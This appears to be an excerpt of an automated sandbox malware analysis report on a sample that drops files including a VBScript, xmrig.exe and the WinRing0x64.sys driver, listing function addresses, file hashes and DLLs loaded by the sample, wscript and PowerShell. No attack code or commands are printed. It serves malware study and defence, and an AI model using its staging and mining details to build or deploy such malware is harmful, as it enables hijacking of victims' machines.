Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C573887C 6_2_00007FF6C573887C
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C571B8AC 6_2_00007FF6C571B8AC
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57247F8 6_2_00007FF6C57247F8
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5745758 6_2_00007FF6C5745758
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5707288 6_2_00007FF6C5707288
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C570A304 6_2_00007FF6C570A304
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C570C308 6_2_00007FF6C570C308
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C571B250 6_2_00007FF6C571B250
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57111D4 6_2_00007FF6C57111D4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57421B0 6_2_00007FF6C57421B0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C573C498 6_2_00007FF6C573C498
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C571EE74 6_2_00007FF6C571EE74
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5721E30 6_2_00007FF6C5721E30
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5725050 6_2_00007FF6C5725050
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5701AA4 6_2_00007FF6C5701AA4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5728A54 6_2_00007FF6C5728A54
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57303B4 6_2_00007FF6C57303B4
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5711A5C 6_2_00007FF6C5711A5C
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C57229B8 6_2_00007FF6C57229B8
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C5741CE0 6_2_00007FF6C5741CE0
Source: C:\Users\user\AppData\Roaming\6.exe Code function: 6_2_00007FF6C571AC34 6_2_00007FF6C571AC34
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033928A8 27_2_00007FF7033928A8
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033D6BEC 27_2_00007FF7033D6BEC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF703395AE8 27_2_00007FF703395AE8
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033D796C 27_2_00007FF7033D796C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033A5F20 27_2_00007FF7033A5F20
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033A9EAC 27_2_00007FF7033A9EAC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033A1494 27_2_00007FF7033A1494
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F043C 27_2_00007FF7033F043C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FA4AC 27_2_00007FF7033FA4AC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C0358 27_2_00007FF7033C0358
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C43D8 27_2_00007FF7033C43D8
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033A03A4 27_2_00007FF7033A03A4
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033E0280 27_2_00007FF7033E0280
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C32E0 27_2_00007FF7033C32E0
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033CD174 27_2_00007FF7033CD174
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033EC85C 27_2_00007FF7033EC85C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F3878 27_2_00007FF7033F3878
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033D2890 27_2_00007FF7033D2890
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF70338A8F8 27_2_00007FF70338A8F8
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033B38BC 27_2_00007FF7033B38BC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033E88CC 27_2_00007FF7033E88CC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C4658 27_2_00007FF7033C4658
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033B366C 27_2_00007FF7033B366C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF70339F694 27_2_00007FF70339F694
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DD644 27_2_00007FF7033DD644
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C3698 27_2_00007FF7033C3698
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF703397594 27_2_00007FF703397594
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033E0C80 27_2_00007FF7033E0C80
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C5C48 27_2_00007FF7033C5C48
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033FBC4A 27_2_00007FF7033FBC4A
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033D9D0C 27_2_00007FF7033D9D0C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033AAB5C 27_2_00007FF7033AAB5C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033ACB9C 27_2_00007FF7033ACB9C
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C3BB0 27_2_00007FF7033C3BB0
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033B1BC4 27_2_00007FF7033B1BC4
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033F8BB8 27_2_00007FF7033F8BB8
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033EEA70 27_2_00007FF7033EEA70
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF70338BAD8 27_2_00007FF70338BAD8
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF703383AD0 27_2_00007FF703383AD0
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033DF0EC 27_2_00007FF7033DF0EC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033E50C4 27_2_00007FF7033E50C4
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C6F74 27_2_00007FF7033C6F74
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C3F96 27_2_00007FF7033C3F96
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033CEF34 27_2_00007FF7033CEF34
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF703392E60 27_2_00007FF703392E60
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033B5EF0 27_2_00007FF7033B5EF0
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C0EAC 27_2_00007FF7033C0EAC
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033C3D80 27_2_00007FF7033C3D80
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033E1D78 27_2_00007FF7033E1D78
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033ABD24 27_2_00007FF7033ABD24
Source: C:\Users\user\AppData\Roaming\1.exe Code function: 27_2_00007FF7033B3E00 27_2_00007FF7033B3E00
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2CADF0 31_2_00007FF75C2CADF0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2A5E30 31_2_00007FF75C2A5E30
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2CCAE8 31_2_00007FF75C2CCAE8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2AF8F0 31_2_00007FF75C2AF8F0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2BA1CC 31_2_00007FF75C2BA1CC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2D03B4 31_2_00007FF75C2D03B4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C1E30 31_2_00007FF75C2C1E30
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2BEE74 31_2_00007FF75C2BEE74
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C5050 31_2_00007FF75C2C5050
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C30E4 31_2_00007FF75C2C30E4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C29B8 31_2_00007FF75C2C29B8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C8A54 31_2_00007FF75C2C8A54
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2D03B4 31_2_00007FF75C2D03B4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2B1A5C 31_2_00007FF75C2B1A5C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2A1AA4 31_2_00007FF75C2A1AA4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C1B80 31_2_00007FF75C2C1B80
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2BAC34 31_2_00007FF75C2BAC34
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2E1CE0 31_2_00007FF75C2E1CE0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C35C4 31_2_00007FF75C2C35C4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2D8600 31_2_00007FF75C2D8600
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2BC688 31_2_00007FF75C2BC688
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2AA66C 31_2_00007FF75C2AA66C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2A76C0 31_2_00007FF75C2A76C0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C2710 31_2_00007FF75C2C2710
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2DF6F4 31_2_00007FF75C2DF6F4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2E5758 31_2_00007FF75C2E5758
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2C47F8 31_2_00007FF75C2C47F8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2A4840 31_2_00007FF75C2A4840
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2D887C 31_2_00007FF75C2D887C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2B58D4 31_2_00007FF75C2B58D4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2BB8AC 31_2_00007FF75C2BB8AC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2B11D4 31_2_00007FF75C2B11D4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2E21B0 31_2_00007FF75C2E21B0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2BB250 31_2_00007FF75C2BB250
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2A7288 31_2_00007FF75C2A7288
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2AC308 31_2_00007FF75C2AC308
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2AA304 31_2_00007FF75C2AA304
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 31_2_00007FF75C2DC498 31_2_00007FF75C2DC498
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\Drivers\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: Joe Sandbox View Dropped File: C:\ProgramData\Drivers\xmrig.exe 0510F1E57B0BC5967A8B658CEA729948219D578B6C9B3A036FF33B4A6A46E495
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\1.exe Code function: String function: 00007FF7033DCDC8 appears 35 times
Source: C:\Users\user\AppData\Roaming\1.exe Code function: String function: 00007FF7033DA384 appears 169 times
Source: C:\Users\user\AppData\Roaming\1.exe Code function: String function: 00007FF70338DFF4 appears 35 times
Source: C:\Users\user\AppData\Roaming\1.exe Code function: String function: 00007FF7033FBA1E appears 52 times
Source: C:\Users\user\AppData\Roaming\1.exe Code function: String function: 00007FF7033DA450 appears 166 times
Source: C:\Users\user\AppData\Roaming\1.exe Code function: String function: 00007FF7033DCE1C appears 83 times
Source: C:\Users\user\AppData\Roaming\1.exe Code function: String function: 00007FF7033FB9FA appears 41 times
PE file contains more sections than normal
Source: xmrig.exe.6.dr Static PE information: Number of sections : 11 > 10
Tries to load missing DLLs
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\6.exe Section loaded: kernel.appcore.dll Jump to behavior
